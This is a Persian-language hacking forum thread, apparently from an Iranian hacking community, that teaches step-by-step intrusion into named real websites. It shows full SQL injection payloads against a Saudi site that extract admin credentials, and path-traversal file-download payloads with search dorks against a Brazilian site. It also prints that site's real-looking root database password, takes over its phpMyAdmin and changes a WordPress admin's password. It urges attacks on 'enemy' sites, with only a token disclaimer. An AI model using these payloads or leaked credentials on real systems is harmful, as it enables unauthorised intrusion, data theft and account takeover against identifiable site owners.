اطلاعیه

**SafeMaster** · 09-20-2021, 09:30 PM

درود عزیزان
خوب فکر میکنم به نقطه ای رسیده باشیم که اولین تارگت خودتونو شروع کنید .
تارگت مورد نظر ما از کشور عربستان سعودی هست :

در ابتدای کار جهت شناسایی آسیب پذیری میتوانید به دو حالت بررسی خود را انجام دهید همانطور که قبل در همین تاپیک گفته بود :

1- شناسایی آسیب پذیری انسانی
2 - شناسایی آسیب پذیری توسط اسکنر

ما تارگت را به اسکنر Acunetix دادیم و منتظر ماندیم تا اسکن تمام شود خروجی اسکن بصورت زیر است :

در این قسمت اسکنر به ما گزارش 1 آسیب پذیری high را داده و آسیب پذیری از نوع Backup Files یا فایل های حساس میباشد ، خوب این خیلی خوبه با توجه به این بکاپ ما میتونیم اطلاعات کانفیگ و یوزر و پسورد دیتابیس رو داشته باشیم و درنهایت به دیتابیس متصل بشیم و رمز ادمینو ببینیم .

اما هدف من از انتخاب این تاراگت گوشزد کردن دو مورد است .
1- اسکنر ها توانایی دقت نسبت به انسان را دارا نمیباشند .
2- حتما تارگت ها انسانی بررسی شود .

تا به اینجای کار ما فایل بکاپ از هدف را داریم که بصورت زیر میباشد :

اطلاعات کامل دیتابیس در اختیار ماست تنها با یک غفلت از ادمین که بکاپ خودشو پاک نکرده در این مرحله فقط کافی هست phpmyadmin و یا سرور پایگاه داده را شناسایی و پس از مشاهده و تغییر اطلاعات ادمین وارد سایت و در نهایت دسترسی شوید .

اما اگر تارگت صفحه مربوط به لاگین دیتابیس را محدود کرده باشید یا از سرویسی مثل Cpanel استفاده کند که برای دسترسی به ورود دیتابیس حتما باید یوزر Cpanel باشید چه کنیم ؟

بررسی اتصال به پورت 3306 را چک کنید .
بر روی سایتهای روی سرور به دنبال کانکشن و صفحات نصب سیستم مدیریت محتوا برای استفاده از اطلاعات کاربری دیتابیس بگردید .
در صورت آسیب پذیر بودن سایتهای دیگر را بررسی کنید .
آسیب پذیری خود را توسعه دهید

به دنبال آسیب پذیری قوی تری برای دسترسی از تارگت بگردید .

در ادامه با ما برای شناسایی آسیب پذیری بیشتر از این تارگت همراه باشید .

**SafeMaster** · 09-20-2021, 09:50 PM

گزارش اسکنر به ما تنها یک آسیب پذیری داد ، اما ما آسیب پذیری دیگری از هدف شناسایی کردیم :

همانطور که گفته بودیم در قسمت های عددی وبسایت ها یا صفحات لاگین و یا کادر جستجو بر اساس دو متود GET و PoST اگر برنامه نویس فیلتر مناسبی تعریف نکرده باشد احتمال حمله میباشد ، خوب ما از طریق متود GET لینک عددی از تارگت پیدا کردیم و میخاهیم بررسی آسیب پذیری SQL INJECTION را بر روی آن انجام دهیم.

پس از بررسی SQLI ما مقدار 404 دریافت کردیم ! آیا این بدین معنی است که تارگت آسیب پذیر نیست ؟

خیر ، در برخی مواقع error log server غیر فعال میشود و تارگت پس از BOF سر ریز خطای خود را نشان نمیدهد بنابراین باید دستوری بررسی شود تا اطمینان حاصل شود تارگت آسیب پذیر است یا خیر با توجه به اینکه اسکنر هم آسیب پذیری SQL شناسایی نکرده است حتمال این وجود دارد که تارگت با SQLI مورد نفوذ قرار نگیرد ؟

با دستور AND تارگت را بررسی میکنیم :

با اجرای این دستور باید صفحه عادی را دریافت کنیم .

کد:

https://aja-ksa.com/pages.php?id=8 AND 1=1

با اجرای این دستور اگر صفحه یا خطایی ای جز صفحه عادی دریافت نمائیم تارگت آسیب پذیر به sql injection میباشد :

کد:

https://aja-ksa.com/pages.php?id=8 AND 1=0

نتیجه بدین صورت است :

با وجود عدم شناسایی اسکنر و در دید اول وقتی کمی با دقت تر بررسی کردیم متوجه آسیب پذیری SQL شدیم .

در مرحله بعد حملات SQL Injection را تا مرحله استخراج یوزر و پسورد مدیر پیش میرویم .

با ما همراه باشید .

**SafeMaster** · 09-21-2021, 04:55 PM

خوب در آموزش قبل چند ترفند برای شناسایی آسیب پذیری پیدا کردیم . (در برخی قسمت ها بین کد ها فاصله گذاشتیم و این به دلیل محدودیت های امنیتی در انجمن میباشد دقت داشته باشید فاصله ها در زمان اجرای دستور حذف شود)
اسکنر توانایی شناسایی آسیب پذیری را نداشت و ما با بررسی دقیق موفق شدیم آسیب پذیری SQL را شناسایی کنیم .
در این مرحله تزریق SQL را بر طبق آموزش های پیشین پیش رو میرویم :

مرحله اول - بدست آوردن تعداد ستون های پایگاه داده :
دستور Order by 1

کد:

https://aja-ksa.com/pages.php?id=8 +order+by+1

با زدن عدد 1 باید محتوای عادی به ما نمایش داده شود و عدد 1 را تا جایی پیش میرویم که به خطا برسیم وقتی به خطا رسیدیم ستون قبل تعداد ستون دیتابیس است :

کد:

https://aja-ksa.com/pages.php?id=8 +order+by+13
error
then
https://aja-ksa.com/pages.php?id=8 +order+by+12

خوب متوجه شدیم تعداد ستون 12 است حالا مرحله بعدی و لیت کردن ستون های دیتابیس برای پیدا کردن ستون آسیب پذیری که بتوانیم در آن تزریق را انجام دهیم :

+u nion+s elect+1,2,3,4,5,6,7,8,9,10,11,12

کد:

https://aja-ksa.com/pages.php?id=8+u nion+s elect+1,2,3,4,5,6,7,8,9,10,11,12

برای نمایش داده شدن ستون های دیتابیس باید صفحه را خالی از هر گونه محتوا کنیم برای اینکار یا قبل از پارامتر عددی سایت که نشان دهنده پست فعلی از دیتابیس است - میگذاریم و یا به عدد بالایی همانند 9999 تغییر میدهیم . بدین صورت :

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+s elect+1,2,3,4,5,6,7,8,9,10,11,12

خروجی بصورت زیر است :

ستون 2 و 4 آماده اجرای دستور میباشند .
در ادامه از دیتابیس جامع و دیفالت درخواست میکنیم تمام جدول های داخل دیتابیس را به ما نمایش دهد ، البته ما میتوانیم از طریق دیتابیس نیم خود هدف اینکار را انجام دهیم ولی در برخی مواقع دیتابیس نیم برای ما نمایش داده نمیشود و مجبوریم از دیتابیس جامع درخواست نمائیم نام دیتابیس جامع information_schema میباشد .

+from +i nformat ion_schema.tables
tab le_name

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+se lect+1,ta ble_name,3,4,5,6,7,8,9,10,11,12+fr om+info rmation_schema.tables

خوب همانطور که ملاحظه میکنید ما از ستون دوم درخواست Table_name را کردیم و تنها یک جدول از پایگاه داده به ما نمایش داده شد در اینجا دو مورد مهم داریم .
اول اینکه اگر تعداد جدول ها زیاد نباشد و همگی در صفحه قابل نمایش باشند از دستور نمایش گروهی Group_concat() استفاده مینمائیم به مثال زری توجه فرمائید :

g roup_concat(ta ble_name)

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+s elect+1,gro up_concat(ta ble_name),3,4,5,6,7,8,9,10,11,12+from+inf ormation_schema.tab les

خروجی :

مورد دوم اینکه اگر تعداد جدول ها زیاد باشد بطوری که در صفحه قابل نمایش نباشد (مانند همین مثال) باید از دستور Limit برای استخراج یک به یک جدول ها استفاده کنیم .

limit+1,1
تنها مقدار 1 اول تغییر میکند و 1 دوم مربوط به تعویض دیتابیس میباشد که در اهداف زیاد به آن نیاز نمیباشد .

نمایش دستور :

کد:

https://aja-ksa.com/pages.php?id=9999+ u nion + s elect + 1,table_name,3,4,5,6,7,8,9,10,11,12 + from+ infor mation_schema.tables+ limit+1,1

مقدار عددی 1 را هر چه بالاتر برویم جدول بعدی را نمایش میدهد من این مقدار با آنقدر بالا رفتم تا به جدول های حساسی همانند admin یا users برسم چون در این جدول ها اسامی کاربران و مدیران به همراه یوزر و پسورد ذخیره میشود . مقدار 79 جدول users را نمایش داد.

**SafeMaster** · 09-21-2021, 05:48 PM

توجه داشته باشید فاصله های اضافی بین دستورات به دلیل فیلتر کلمات امنیتی در فروم میباشد فاصله ها راحذف کنید بطور مثال union برابر شده با u nion

limit+1,1
تنها مقدار 1 اول تغییر میکند و 1 دوم مربوط به تعویض دیتابیس میباشد که در اهداف زیاد به آن نیاز نمیباشد .

نمایش دستور :

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+s elect+1,table_name,3,4,5,6,7,8,9,10,11,12+f rom+i nformation_schema.tables+limit+1,1

مقدار عددی 1 را هر چه بالاتر برویم جدول بعدی را نمایش میدهد من این مقدار با آنقدر بالا رفتم تا به جدول های حساسی همانند admin یا users برسم چون در این جدول ها اسامی کاربران و مدیران به همراه یوزر و پسورد ذخیره میشود . مقدار 79 جدول users را نمایش داد.

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+s elect+1,table_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+79,1

مرحله بعد پیدا کردن نام ستون ها ی users برای استخراج اطلاعات داخل آن میباشد ، به این دلیل نیاز داریم نام ستون های جدول را بفهمیم اول اینکه استخراج موفق نیازمند نام دقیق است دوم اینکه شاید برنامه نویسی به زبان کشور خود نام ستون هایی همانند username و password را تغییر داده باشد بطور مثال کشور خودمان ایران namkarbari و ramz

نکته * در این مرحله نیاز است جدول نام جدول users را به کارکتر های قابل درک برای دیتابیس تغییر دهیم بطو مثال hex و یا union char
برای تبدیل به Hex ابزار متعددی وجود دارد شما میتوانید با وبسایت زیر این تبدیل را انجام دهید همچنین افزونه هایی نظیر Hackbar در مرورگر ها نیز امکانات بی نظیری به شما میدهند .

Text to Hex Converter

کد:

https://www.online-toolz.com/tools/text-hex-convertor.php

پس از تبدیل مقدار 0x را به ابتدای hex خود وارد نمائید بدین صورت :

کد:

0x7573657273

دستور به این صورت میشود :

کد:

+f rom+information_schema.c olumns+w here+table_name=0x 7573657273

و در ستون 2 که ستون آسیب پذیر بود به جای Table_name مقدار column_name را درخواست میکنیم :

شکل کلی دستور :

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+s elect+1,group_c oncat (column_name),3,4,5,6,7,8,9,10,11,12+f  rom+i nformation_schema.c olumns+w here+t able_name= 0x 7573657273

خروجی :

خوب حالا ما عنوان ستون های جدول users را داریم :

کد:

id,user_name,password,passcode,adminpower,utype,name,email,profile,avatar,created_date,created_time,login_date,login_time,status

فقط نیاز داریم یوزر و پسورد را بکشیم در این مرحله کار راحت تر است :

برای اینکه بین یوزر و پسورد : قرار بگیرد از مقدار hex کارکتر : استفاده میکنیم که به این صورت است 0x3a

دستور نهایی :

کد:

https://aja-ksa.com/pages.php?id=9999+u nion+s elect+1,group _c oncat (user_name , 0x3a , password),3,4,5,6,7,8,9,10,11,12+ from+ users

مقدار یوزر و پسورد شناسایی شد ، پسورد بصورت Md5 هش شده است در برخی تارگت ها پسورد بصورت عادی و در برخی هش شده است برای شکستن هش پسورد میتوانید از سایتهای online md5 hash crack و ابزارهای مختلفی مثل hashcat استفاده نمائید :

از بهترین سایتهای کرک هش :

کد:

https://cmd5.org
https://hashes.com/en/decrypt/hash

خوب من هش رو به سایت مقابل دادم و پسورد کرک شده را دریافت کردم :

حالا نوبت ورود به صفحه مدیریت سایت است معمولا صفحه های مدیریت با عنوان های

admin
administrator
manage
manager
admincp
controlpanel

نام گذاری میشود در اینجا نام صفحه لاگین admin میباشد :

خوب تبریک میگم کار ما تمام شد ، حالا برای آپلود شل به دنبال آپلودر بگردید و در نهایت از تارگت شل بگیرید .

این مطلب صرفا جنبه آموزشی و آگاهی دارد لطفا خرابکاری نکنید و بچه های خوبی باشین و از این اطلاعات برای بالا بردن امنیت استفاده کنید .

لطفا اگر از مطالب بنده استفاده کردید حتما لایک و کامنت بگذارید تا بازخورد این مطالب که ساعتها برای آماده سازی آنها توسط بنده زمان گذاشته شده نشان داده بشود .

با تشکر

**XYZ** · 11-01-2021, 08:17 PM

با تشکر و خسته نباشید مطالب خیلی آموزنده بودند به امید ادامه یافتن این آموزش های گرانبها

**SafeMaster** · 11-15-2021, 12:40 AM

نوشته اصلی توسط XYZ نمایش پست ها

با تشکر و خسته نباشید مطالب خیلی آموزنده بودند به امید ادامه یافتن این آموزش های گرانبها

ممنون از توجه شما دوست عزیز

در حال آماده سازی آموزش های آتی هستم.

**SafeMaster** · 11-21-2021, 06:25 PM

درود بر عزیزان ایران هک
در آموزش های قبل توضیحی در مورد آسیب پذیری LOCAL FILE DISCLOSURE داشتیم در ادامه میخواهیم این آسیب پذیری را بطور کامل مورد آنالیز قرار دهیم ، با ما همراه باشید .

این آسیب پذیری از خانواده آسیب پذیری های LOCAL FILE میباشد با نام LOCAL FILE DISCLOSURE و یا LOCAL FILE DOWNLOAD شناخته میشود توافت اصلی این آسیب پذیری با LFI ار میتوان در امکان دریافت فایل های درخواستی دانست . بطور مثال تارگتی با لینک و پارامتر زیر را در نظر بگیرید :

کد:

https://example.com/download.php?filename=IRH.pdf

مکانیستم کلی این فایبل و پارامتر امکان دانلود فایل های document از سایت میباشد ، حال اگر برنامه نویس در هنگام تعریف کردن متود GET و فیلتر پارامتر ها بطور صحیح مقدار دهی نکرده باشد باعث میشود نفوذگر بتواند فایل های دیگر بر روی سایت و سرور را دانلود نماید .

همانطور که قبلا گفته بودیم مهمترین فایل در یک سیستم مدیریت محتوا CMS فایل کانفیگ CONFIG میباشد وظیفه این فایل ارتباط نرم افزار تحت وب با دیتابیس میباشد و درون آن اطلاعات اتصال به دیتابیس قرار دارد ، اگر نفوذگر به این فایل دسترسی پیدا نماید امکان اتصال به دیتابیس و بدست آوردن و یا حتی ویرایش اطلاعات کاربری و مدیریتی را دارا میباشد .

حالا به توجه به آسیب پذیری LFD اگر تارگت آسیب پذیر باشد میتوانیم فایل کانفیگ را دانلود و به اطلاعات دیتابیس دسترسی پیدا کنیم .

چطور بفهمیم تارگت آسیب پذیر میباشد یا خیر ؟

کد:

https://example.com/download.php?filename=IRH.pdf

کافی است بجای درخواست دادن فایل مجاز یک فایل غیر مجاز را بررسی نماییم و باید مطمئن باشیم که فایل در دایرکتوری وجود داشته باشد که با توجه به لینک بالا ما میدانیم که خود فایل download.php در دایرکتوری وجود دارد پس برای تست نفوذ خود فایل را به جای فایل PDF درخواست میکنیم :

کد:

https://example.com/download.php?filename=download.php

در این مرحله اگر فایل download.php دانلود شد و محتوا بصورت server side و یا کد اصلی php بود تارگت آسیب پذیر است در غیر اینصورت برنامه نویس مراتب امنیتی را رعایت کرده و تارگت احتمال آسیب پذیر نبودن را داراست .

با درخواست دانلود فایل PHP و دریافت آن باید به دنیال گرفتن فایل مهمتر یا همان config باشیم در ادامه برای اینکار اگر مسیر فایل کانفیگ را میدانیم که درخواست آن را میدهیم :

مسیر کانفیگ مورد نظر includes/config.php

کد:

https://example.com/download.php?filename=includes/config.php

که در نهایت فایل دریافتی ما باید شامل اطلاعاتی همانند زیر باشد :

کد:

<?php
//Hidden configuration file containing database credentials.
$hostname = 'localhost';
$username = 'example_site_db';
$password = 'RET%7rt';
$database = 'example_site';
$connector = mysql_connect($hostname, $username, $password);
mysql_select_db($database, $connector);
?>

در نهایت هکر با اتصال به دیتابیس به وسیله اطلاعات فوق میتوانید به اطلاعات محرمانه مدیریت سایت و کاربران دسرتسی پیدا کند .

حالا اگر مسیر کانفیگ را نمیدانستیم چکار باید بکنیم ؟

در این موارد باید سایر فایل ها را دریافت کنیم و در کد به دنبال خطوط include و مسیر های منتهی به فایل دیتابیس باشیم برای اینکار با دانلود فایل هایی نظیر :

کد:

https://example.com/download.php?filename=index.php
https://example.com/download.php?filename=header.php
https://example.com/download.php?filename=footer.php
https://example.com/download.php?filename=page.php
....

بررسی را انجام میدهیم و با چک کردن کد های درون فایل باید به دنبال چنین خطی باشیم :

کد:

#include config
<?php
session_start();
if (array_key_exists("logout", $_GET)) {
require("config.inc.php");
unset($_SESSION['USERID']);
unset($_SESSION['USERNAME']);
session_destroy();
header("location:".SITEURL."/"); exit;
}

if(isset($_REQUEST["offset"]))
$DFOFFSET = sprintf("%d",$_REQUEST["offset"]);
if(isset($_COOKIE["MSG"])) { $MSG = $_COOKIE["MSG"]; setcookie("MSG", "", false, "/"); }
$PAGENO = 0;

require("connectdb.inc.php");
require("inc/tpl.class.inc.php");
require("inc/common.inc.php");
require("core/form.class.inc.php");
require("core/validate.inc.php");
require("inc/site.inc.php");
require("inc/functions.php");

معمولا فایل کانفیگ در ابتدای کد در فایل ها معرفی میشود در این نمونه require("config.inc.php"); فایل کانفیگ ماست ، دقت داشته باشید اگر مسیر در فولدر بود طبق همان فولدر فایل را دریافت کنید مثلا :

db/config.php

کد:

https://example.com/download.php?filename=/db/config.php

تا به اینجای کار توضیحات زیاد سخت نبود اما اگر در فولدری فایل download.php یا فایل دریافتی ما قرار داشته باشد دانلود کردن به چه صورت میباشد ؟

به نمونه زیر دقت کنید :

کد:

https://example.com/core/system/download.php?filename=IRH.php

فایل دانلود در مسیر /core/system/ قرار دارد پس از تست آسیب پذیر بودن با خود فایل download.php

کد:

https://example.com/core/system/download.php?filename=download.php

حالا باید برای دریافت فایل کانفیگ اقدام کنیم ، مسیر کانفیگ را نمیدانیم و نیاز داریم فایل index.php , header.php , page.php .... را از شاخه اصلی سایت دریافت کنیم (شاخه اصلی یعنی محل اصلی قرار گرفت فایل ریشه معمولا درمسیر public_html یا httpdocs یا www قرار میگیرد )

برای اینکار با توجه به دو فولدر جلوتر از فایل index یا ریشه باید دو فولدر به عقب برگردیم تا کانفیگ را دریافت نمائیم :
با استفاده از ../.. میتوانیم به پوشه های قبلی باز گردیم مانند نمونه زیر :

کد:

https://example.com/core/system/download.php?filename=../../index.php

حالا ما index.php را دریافت کردیم مانند نمونه بالا دنبال فایل دیتابیس میگردیم و در نهایت آن را دانلود میکنیم دقت داشته باشید به مسیر فولدر های توجه کنید و در هنگام درخواست دانلود باید مسیر دانلود فایل مورد نظر به دقت وارد شود .

در ادامه آموزش تصویری و در نهایت آموزش ویدئویی این آسیب پذیری بر روی تارگت های مختلف را خواهیم داشت .

با ما همراه باشید

**SafeMaster** · 11-21-2021, 06:56 PM

درود عزیزان با ادامه آموزش در خدمت شما هستیم قبل از هر چیز :

چطور این آسیب پذیری را شناسایی و پیدا کنیم ؟

برای شناسایی این آسیب پذیری چندین راه وجود دارد .

مرحله اول زمانی است که شما یک سایت مشخص دارید و قصد شناسایی آسیب پذیری همانند LFD را از آن دارید .

در این مرحله شما میتوانید در ابتدا لینک های وبسایت را بررسی کنید تا به فایلی که برای دریافت مقالات ، تصاویر و فایل ها میباشد برسید اگر مکانیزم سایت بطوری باشد که از دانلود استفاده کند باید شناسایی راحت تر باشد .
در صورت شناسایی نشدن لینک با پارامترد انلود فایل میتوانید از اسکنر های وب مانند acuneitx و یا گوگل اپراتورس استفاده کنید :
گوگل اپراتورس

کد:

intitle:جستجو در عنوان
inurl:جستجو در لینک
intext:جستجو در متن داخل صفحات
site:جستجو در سایت یا دامنه 
phonebook:جستجو در شماره تلفن
maps:جستجو در نقشه
book:جستجو در کتابها
link:جستجو در لینک

میتوانید در گوگل کلمات کلیدی این آسیب پذیری را چک کنید site:target.com inurl:download.php

مرحله دوم زمانی است که میخواهید تارگت را از یک کشور و یا دامنه مرکزی خاص شناسایی بکنید که بهترین گزینه اپراتور های گوگل یا به اصطلاح گوگل دورک ها هستند :

در گوگل عبارت زیر را جستجو کنید تا تارگت های بسیاری برای بررسی پیدا کنید :

کد:

site:.com inurl:download.php
or
site:.com inurl:download.php?filename=
....

شما میتوانید از گوگل دورک های مختلف برای جستجو آسیب پذیری ها استفاده کنید :

کد:

get.php?file=
get.php?s=
download.php?f=
....

در نمونه زیر یک نمونه آسیب پذیری معرفی شده از یک سیستم مدریت محتوا با آسیب پذیری LFD معرفی شده است :

کد:

# Exploit Title: HRSALE - HR Management PHP Script - LFD
# Google Dork: N/A
# Date: 2018/1/8
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: http://hrsale.com
# Software Buy: https://www.codester.com/items/8599/hrsale-hr-management-php-script
# Demo: http://newdemo.hrsale.com/
# Version: 1.0.6
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
http://[target]/admin/download?type=files&filename=../../../../../../ etc / passwd
database:
http://[target]/admin/download?type=files&filename=../../application/config/database.php
ex:
http://newdemo.hrsale.com/admin/download?type=files&filename=../../../../../../ etc / passwd
http://newdemo.hrsale.com/admin/download?type=files&filename=../../application/config/database.php

شما میتوانید با جستجو در گوگل آسیب پذیری های ثبت شده برای انواع سیستم مدیریت محتوا در حوزه انواع آسیب پذیری را پیدا کنید و کم کم خودتان از سیستم مدیریت محتوا های مختلف آسیب پذیری شناسایی کنید .
برای آشنایی با گوگل دورک های مختلف در انواع آسیب پذیری فایل پیوست شده را دانلود و تمرین نمائید . دورک های فوق پر تکرارترین ها در جستجوی گوگ در سال 2019 تا 2020 بوده است .

ادامه دارد ....

فایل های پیوست شده

dorks.zip (31.1 کیلو بایت, 3 مشاهدات)

**SafeMaster** · 11-21-2021, 07:32 PM

خوب حالا تا اینجای کار شما نحوه شناسایی آسیب پذیری را آموخته اید و همچنین نحوه بررسی آسیب پذیری و ...

حالا یک نمونه تصویری را با هم پی میبریم (تهیه این آموزش ها ساعت ها زمان برده است و برای آموزش و آگاهی شما قرار گرفته با ارسال نظرات ، سوالات ، تمرین ها و لایک کردن ما را حمایت کنید)

*//* This vulnerability is known by two names *//*
این آسیب پذیری با دو نام زیر شناخته میشود

Local File Disclosure Vulnerability | افشا فایل داخلی

Local File Download Vulnerability | دانلود فایل داخلی

هدف اصلی در این حمله دریافت فایل های حساس سیستم مدیریت محتوا میباشد
فایل حساس می تواند فایل کانفیگ که شامل اطلاعات دیتابیس است باشد

The main purpose of this attack is to receive sensitive files of the content management system
A sensitive file can be a config file that contains database information

نمونه از فایل های کانفیگ
config.php
wp-config.php
configuration.php
.....

برای شناسایی فایل کانفیگ پس از شناسایی آسیب پذیری اقدام به دانلود فایل

کد:

index.php

در شاخه اصلی سایت کنید و با خواندن کد پی اچ پی و پیدا کردن خط

کد:

include

میتوانید مسیر کانفیگ را شناسایی کنید .
برای مثال در فایل زیر مسیر به این صورت مشخص شده است
index.php
include "includes/class_conexao.php";

در نظر داشته باشید اگر نیاز به تغییر دایرکتوری و برگشت به عقب بودید از

کد:

../../ بازگشت به دو فولدر قبلتر
../ بازگشت به یک فولدر قبلتر
../../.. بازگشت به سه فولدر قبلتر
و .....

استفاده کنید .

اگر در فایل index.php مسیر کانفیگ را شناسایی نکردید اقدام به دانلود سایر فایل ها کنید تا فایلی که به دیتابیس مرتبط میباشد را دریافت کنید در اموزش های ثبلی توضیح داده شده است .

با هم نمونه عملی پیش میبریم و تا دسترسی از کنترل پنل مدیریت حمله را ادامه میدهیم :

خوب من یک تارگت مناسب برای آموزش شما عزیزان شناسایی کردم :

با هم شروع میکنیم :

مرحله اول شناسایی پارامتر دانلود :

در ابتدا فایل عادی که خود سایت معرفی کرده بود را از طریق پارمتر ?doc= و در فایل download.php درخواست دانلود کردیم که با موفقیت دانلود شد .

حالا نوبت تست آسیب پذیر بودن است اگر تارگت خود فایل Download.php را دانلود کند و فایل دارای محتوای php باشد تارگت آسیب پذیر است .

با هم میبینیم :

کد:

www.semeia.org.br/admuploads/uploads/download.php?doc=download.php

خوب فایل download.php دانلود شد حالا با هم کد های داخل ان را بررسی میکنیم :

همانطور که مشاهده میکنید فایل دانلود شده با کد php قابل رویت است یعنی ما میتوانیم فایل های اصلی یا serverside را از طریق این آسیب پذیری دریافت کنیم .

حالا به شاخه اصلی برمیگردیم تا index.php یا سایر فایل ها را دانلود کنیم تا به مسیر کانفیگ برسیم :

کد:

www.semeia.org.br/admuploads/uploads/download.php?doc=download.php

در حال حاضر در این شاخه قرار داریم admuploads/uploads/ برای رسیدن به شاخه اصلی نیاز داریم مسیر را به عقب برگردیم :

پس دو فولدر به عقبتر میریم ../../

کد:

www.semeia.org.br/admuploads/uploads/download.php?doc=../../index.php

با هم نتیجه را میبینیم :

نمایش کد داخل index.php :

داخل فایل index.php سه فایل include شده است .
header.php
footer.php
publicacoes.php

ادامه در آموزش بعدی

**SafeMaster** · 11-21-2021, 07:33 PM

تا وقتی مسیر فایل کانفیگ و فایل کانفیگ پیدا نشده فایل دانلود میکنیم و مسیر های include را بررسی میکنیم حالا این سه فایل را دریافت میکنیم .

در فایل header.php , footer.php مسیر شناسایی نشد اما در فایل publicacoes.php

شناسایی شد .

کد:

www.semeia.org.br/admuploads/uploads/download.php?doc=../../publicacoes.php

همانطور که مشاهده میکنید در خط اول فایل کانفیگ پیدا شد .

محتوای فایل publicacoes.php :

کد:

<?php

$page = 'publicacoes';
// include "includes/class_conexao.php";

$titulo = 'Nossas publicações';
$link = 'http://www.semeia.org.br/publicacoes';
$desc_og = 'Estudos e Conteúdos Técnicos';
$bg_link = 'http://www.semeia.org.br/images/publicacoes/banner.jpg';

include "header.php";
?>
<title>Nossas Publicações</title>
<section class="main-container">
<hr>
<div id="publicacoes" class="banner-topo">
<div class="banner-topo_content">
<h2 class="title-publics">Nossas publicações</h2>
<span class="add-publi"><img src="images/publicacoes/titulo_mark.png"></span>
<img src="http://www.semeia.org.br/alt.png" alt="Parques Brasil" />
</div>
</div>
...

چون این سایت ایتالیایی هست اسم فایل کانکشن هم به ایتالیایی گذاشته شده برای همین که نام ها با یکدیگر فرق دارند باید مسیر include را دنبال و فایل ها دانلود کنید تا به یک زبان مشترم یعنی یوزر و پسورد برسیم

مسیر کانفیگ includes/class_conexao.php

دانلود :

کد:

www.semeia.org.br/admuploads/uploads/download.php?doc=../../includes/class_conexao.php

نه تنها اطلاعات دیتابیس رو به دست آوردیم بلکه اینقدر این تارگت خوبه که یوزر root دیتابیس رو زدیم

یعنی تمام پایگههای داده روی این سرور برای ما قابل رویت هست .

حکایت با یک تیر سه نشان زدن

کد:

class Conexao{
var $host = "localhost";
var $user = "root";
var $password = "ativ2oi3";
var $database = "uploads";
var $database_jo = "semeiabrasil";

var $mysqli;

خوب خسته نباشید ما اطلاعات کانفیگو با موفقیت بدست آوردیم حالا میریم برای اتصال به دیتابیس البته توی آموزش بعدی

**SafeMaster** · 11-21-2021, 08:03 PM

خوب تا اینجای کار اطلاعات دیتابیس رو داریم حالا برای اتصال به دیتابیس به چند نکته توجه کنید .

نوع کنترل پنل مدیریت سرور به سیستم‌عامل تارگت بستگی دارد. ازاین‌رو اگر سیستم‌عامل لینوکس است می‌توانید از گزینه‌های kolox ،directadmin ،webmin و درنهایت cpanel استفاده کنید.

اما امنیت و نوع سیستم هر کدام فرق میکند بطور مثال در سیستم هایی نظیر kolox ،directadmin ،webmin میتوانیم به صورت مستقیم بدون هیچ دردسری به phpmyadmin سرور که مدیریت پایگاه داده میباشد با اطلاعات دیتابیس متصل شویم .

اما در کنترل پنل CPANEL کار کمی سخت تر است برای دسترسی به میدریت پایگاه داده در سی پنل نیاز هست کاربر اول وارد هاست خود شود و سپس وارد PHPMYADMIN شود و بطور مستقیم با لینک نمیتوان به آن متصل شد برای دسترسی به پایگاه داده در CPANEL در زمانی که اطلاعات دیتابیس را دارید پنج پیشنهاد برای شما دارم :

1. دسترسی از سرور و اتصال به دیتابیس (بررسی سایتهای دیگر روی سرور و دسترسی از یک تارگت + آپلود شل و اتصال به دیتابیس)
2. جستجو در سایت و سایتهای سرور برای پیدا کردن نرم افزار های مدریت دیتابیس نصب شده احتمالی مثل Dumper یا Adminer
3. جستجو در سایتهای سرور و بررسی اسکریپت های نصب نشده و یا دارای پوشه install و نصب سیستم بر روی همین دیتابیس که باعث دسترسی به سایت و در نهایت اتصال به دیتابیس میشود البته چک کنید که اسم جدول ها با هم یکی نباشد .
4. بررسی احتمال باز بودن اتصال ریموت به دیتابیس از طریق پورت 3306 با ابزارهای اتصال مثل SQL Yog , ...
5. بررسی اطلاعات دیتابیسی که داریم و خط server یا host به امید اینکه شاید دیتابیس به یک مسیر ریموت متصل باشد .

نکته * برخی مواقع نام فولدر phpmyadmin تغییر داده شده پس اگر نتیجه نگرفتید دایرکتوری ها را بروت فورس کنید تا نام phpmyadmin را پیدا کنید .

خوب در این تارگت ما مستقیم به پایگاه داده دسترسی داریم

کد:

http://www.semeia.org.br/phpmyadmin

اطلاعات دیتابیس

کد:

var $host = "localhost";
var $user = "root";
var $password = "ativ2oi3";
var $database = "uploads";
var $database_jo = "semeiabrasil";

با یوزر و پسورد به دیتابیس متصل میشویم :

یوزر root
پسورد ativ2oi3

همانطور که گفتم یوزر root را زدیم و کل پایگاههای داده لینک شده را در تصویر داریم .

حالا باید پیاگاه داده مربوط به قسمت را بررسی و پسورد را برای لحظاتی تغییر دهیم تا درتسیر از سایت بگیریم بطور مثال من یک وردپرس بر روی هدف پیدا کردم :

معمولا در دیتابیس ها مسیر نصب قرار دارد در وردپرس در جدول wp_option مسیر دایرکتوری که ورپردس بر روی آن نصب شده است برای ما می آید :

بر روی یک ساب وردپرس نصب شده و ما مسیر را پیدا کردیم حالا میریم سراغ جدول wp_users و تغییر پسورد ادمین و در نهایت لاگین داخل پنل :

با ویرایش و قرار دادن پسورد جدید در دیتابیس با یوزر ادمین داخل سایت لاگین میکنیم :

و تمام

تمام دیتابیس های داخل پایگاه داده ما رو به یک سیستم مدیریت محتوا در قسمت های مختلف سایت و حتی دامنه های دیگر متصل میکنه چون یوزر root هست .

خوب امیدوارم استفاده کرده باشید همه چی رو گفتم
در نظر داشته باشید این اموزش ها نتیجه سالها تلاش هست که در قالب یک مطلب کامل به شما هدیه شده قدر اونو بدونید و آگاه باشید . سایتهای خودتونو امن کنید تا دشمن نتونه به اون ورود کنه ولی شما به دشمن ورود کنید و پرچم ایران ببرید بالا

امنیت خودتو ببرین بالا امنیت دشمنو ضربه بزنید

در ضمن ما به ادمین این سایت اطلاع دادیم در مورد باگش تا رفعش کنه لطفا فقط برای تمرین از دورک های گوگل استفاده کنید و آسیبی به تارگت وارد نکنید .

منتظر سوالات نظرات و لایک های عزیزان هستم فیلم اموزشی این اثر نیز تا ساعاتی دیگر اکران می شود پایین همین پست .

ادامه دارد ....

